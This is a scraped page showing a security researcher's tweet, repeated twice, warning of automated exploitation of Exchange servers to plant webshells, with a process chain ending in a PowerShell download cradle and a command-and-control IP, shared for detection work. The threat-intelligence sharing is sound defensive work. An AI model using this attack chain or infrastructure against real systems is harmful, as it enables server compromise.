Analyse @jhencinski's tweets
@jhencinski
| 8,431 followers
Seeing automated exploitation of Internet-facing Exchange servers to drop webshell (working to confirm CVE#)
- exploit to deploy webshell
- w3wp.exe ➡️ CMD shell ➡️ PS download cradle
- c2: 86.105.18.116
Process tree below so folks can query / write detections
Also, update! https://t.co/mO1fmLfacQ
- exploit to deploy webshell
- w3wp.exe ➡️ CMD shell ➡️ PS download cradle
- c2: 86.105.18.116
Process tree below so folks can query / write detections
Also, update! https://t.co/mO1fmLfacQ